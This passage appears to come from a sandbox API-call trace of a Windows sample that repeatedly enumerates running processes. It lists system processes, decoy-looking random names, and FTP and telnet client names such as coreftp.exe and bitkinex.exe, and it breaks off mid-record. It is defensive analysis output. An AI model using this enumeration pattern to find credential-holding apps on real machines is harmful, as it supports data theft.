lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0261.166] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0261.168] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0261.170] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0261.171] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.173] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0261.175] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0261.176] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0261.178] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.180] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.181] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0261.183] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.185] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0261.186] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0261.188] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0261.190] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0261.248] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0261.250] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0261.252] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0261.253] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0261.255] CloseHandle (hObject=0x2338) returned 1 [0261.255] Sleep (dwMilliseconds=0x64) [0261.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0261.315] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.317] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.318] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.320] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.321] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.323] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.324] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.327] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.328] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.330] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.332] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.371] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.374] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.375] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.377] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.378] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.380] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.381] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.383] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.384] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.386] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0261.387] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.389] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0261.391] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.392] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0261.394] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0261.395] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0261.397] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0261.399] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0261.400] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0261.402] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.403] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.405] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0261.444] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.446] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.447] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.449] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0261.451] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0261.452] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0261.454] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0261.455] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0261.457] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0261.459] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0261.460] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0261.461] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0261.463] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0261.465] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0261.467] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0261.469] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0261.470] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0261.472] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0261.473] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0261.475] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0261.477] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0261.478] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0261.479] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0261.520] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0261.521] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0261.523] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0261.526] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0261.528] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0261.530] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0261.532] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, 